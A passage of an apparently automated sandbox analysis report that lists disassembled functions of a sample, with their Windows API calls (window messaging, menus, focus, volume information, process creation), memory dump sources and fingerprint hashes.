                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002651B1
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002651B8
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                                                            • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                                                            • Opcode ID: cb72273304c035d45a16895fb56863bda14f7cbecc2d689304ec320bc7abc2ca
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8283ed2bac51113e3f09cbdf46a5612b283eca4df46a2ee58ee09272a144cb17
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb72273304c035d45a16895fb56863bda14f7cbecc2d689304ec320bc7abc2ca
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 822190B561061AAFDB00DF18DC85DB737ADEF5A364F140049F9049B3A1CB70EC65CAA0
                                                                                                                                                                                                                                                                                                                            Function 00264253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002642DC
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002642EC
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00264312
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                                            • String ID: Listbox
                                                                                                                                                                                                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a6eadbb78099ecf9cd66cbddc3f366e5778ae0e27d53f54e037a02eb1d2d34b3
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c22273ce0eee70be9fcaa90d2b34590021a6646ba0e73d612b3ef63e7e349201
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6eadbb78099ecf9cd66cbddc3f366e5778ae0e27d53f54e037a02eb1d2d34b3
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B219232620119BBEF119F94DC85FBB376EEF89754F218114F9409B190CA719CA18BA0
                                                                                                                                                                                                                                                                                                                            Function 00245439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0024544D
                                                                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002454A1
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,0026DCD0), ref: 00245515
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                                            • String ID: %lu
                                                                                                                                                                                                                                                                                                                            • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 50fcafa1d28d62b489571e4ff01a29edc7a3e7df270922e5f2ca9b0523ff335e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a3e8124cd71f10e2d091ff15126c383f0108bdf9f40ac0a31c286692db9b8a3c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50fcafa1d28d62b489571e4ff01a29edc7a3e7df270922e5f2ca9b0523ff335e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18315070A10119AFDB10DF54C885EAA77B9EF09308F1480A5E849DB362DB71EE45CF61
                                                                                                                                                                                                                                                                                                                            Function 00268305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 00268339
                                                                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(?,0026802F,00000000), ref: 002683B0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                                                                                                                                                                            • String ID: (*$(*
                                                                                                                                                                                                                                                                                                                            • API String ID: 3814560230-1611287839
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 16f0ec7da4ad09e1ce49521c87db2136aa13fd6e8c0cc7cf709fdab8c947d1ba
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b26cd6619f36fb075bef2ecadc9ea85ff1d2d8c344c7b5a7f2efc195fd56f178
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16f0ec7da4ad09e1ce49521c87db2136aa13fd6e8c0cc7cf709fdab8c947d1ba
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78211974210206DFC7248F28E894A96B7E5AB5A720F200759F875873E0DB70A864CB60
                                                                                                                                                                                                                                                                                                                            Function 00264C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00264CED
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00264D02
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00264D0F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6ee839f7da0bf7cb2c26ed37ae2cb5b92d39d36da9acb2c190e58b54dddab3a8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 04b95254ca555d76eb46c398b004db0ca5181cff051d183a5fdd803398258a7d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ee839f7da0bf7cb2c26ed37ae2cb5b92d39d36da9acb2c190e58b54dddab3a8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78113671650208BEEF206F69DC06FAB3BA8EF85B24F110115FA80E21E0C671DCA0DB20
                                                                                                                                                                                                                                                                                                                            Function 0023389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002336F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00233712
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002336F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00233723
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002336F4: GetCurrentThreadId.KERNEL32 ref: 0023372A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002336F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00233731
                                                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 002338C4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023373B: GetParent.USER32(00000000), ref: 00233746
                                                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0023390F
                                                                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(?,00233987), ref: 00233937
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                                                                                                                                                                            • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a78f6dc48ba59a9710f481a4e7232a84d161480ff38711a93d8616f18714c37f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 89b66efb59f187d2f15d27997208da5c54121f5f3772111769287e8676a9b0d4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a78f6dc48ba59a9710f481a4e7232a84d161480ff38711a93d8616f18714c37f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9811A5F1B10209ABCF11BF749C8AAED77A99F94304F048065F9099B292DFB09A55CF30
                                                                                                                                                                                                                                                                                                                            Function 001D59FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 001D5A34
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,001D37B8,?,?,?,?,?,001D3709,?,?), ref: 001D5A91
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                                                                                                                                                                            • String ID: <)*$<)*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2587070983-3298886051
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6ce3c016edd60e5fb7713fb89ac2b6e6ce6191a18d083758f2d5addcef1d7d44
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5777092cbfbca1e7b4ea0a53c8ee2431430d57c76ffbb4c16b21cec84d539c4f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ce3c016edd60e5fb7713fb89ac2b6e6ce6191a18d083758f2d5addcef1d7d44
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03211A34616A13CFDB18DF1DF898B6633E2BB56B11F25415AE8069B760CF349C48CB01
                                                                                                                                                                                                                                                                                                                            Function 00266321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00266360
                                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0026638D
                                                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32(?), ref: 0026639C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ba1ddf9a992f4437dc3b5803c269e8a430193e02b1f07ba1028cf7665fe94ba9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c70d57974224674cdc3cd6fa1448a4a9bb69629a13e59b1e520b5662a2c0f76f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba1ddf9a992f4437dc3b5803c269e8a430193e02b1f07ba1028cf7665fe94ba9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F01C43152421CEFDB119F11DC88BAE7BB4FF45710F108099E40AD6150CB708AA0EF21
                                                                                                                                                                                                                                                                                                                            Function 0026823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,002A28E0,0026AD55,000000FC,?,00000000,00000000,?), ref: 0026823F
                                                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00268247
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D2234: GetWindowLongW.USER32(?,000000EB), ref: 001D2242
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 002682B4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 3601265619-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 423b2d1ad371217755ae0a8c53ce0edbec4059747e241d178df50122e1db9504
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 251a90ea456b787070147f148f7977e917795dbfc3f30d897193d50545a9fd38
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 423b2d1ad371217755ae0a8c53ce0edbec4059747e241d178df50122e1db9504
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1018431602941CFC325DF78E858A6A33E6EF8A324F24426DE816973A0CF316C5BCB50
                                                                                                                                                                                                                                                                                                                            Function 00268526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(?), ref: 00268576
                                                                                                                                                                                                                                                                                                                            • CreateAcceleratorTableW.USER32(00000000,?,?,?,0024BE96,00000000,00000000,?,00000001,00000002), ref: 0026858C
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,0024BE96,00000000,00000000,?,00000001,00000002), ref: 00268595
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 986409557-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ffd705723716168ba55c0394ff12d8c4218e829ac503cb1e9ddf7f90c63ecaa8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 43d92cb433f48f1b0031284ee65a0edc7e81b74e63d6766df0bf5d886bd47370
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffd705723716168ba55c0394ff12d8c4218e829ac503cb1e9ddf7f90c63ecaa8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0014C3061130ACFCB249F69EC8CA6677B1FB15721F61861EF512976B0DB70A9A8CF41
                                                                                                                                                                                                                                                                                                                            Function 00268BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002A4038,002A407C), ref: 00268C1A
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 00268C2C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                                            • String ID: 8@*$|@*
                                                                                                                                                                                                                                                                                                                            • API String ID: 3712363035-3685754380
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 645ba25ccb897a43ee283a5a0f6bfebd478eb80eb552f57547d1db3c0788b671
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d4f6ac00722909d96c0bd193d537fddfd405deda6e0617591615c23df6081b63
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 645ba25ccb897a43ee283a5a0f6bfebd478eb80eb552f57547d1db3c0788b671
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0BEB2640308BBE3143B61BC49F773E5CEB5A350F000061FB08D61A1DBF18C2096B9
                                                                                                                                                                                                                                                                                                                            Function 0022E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
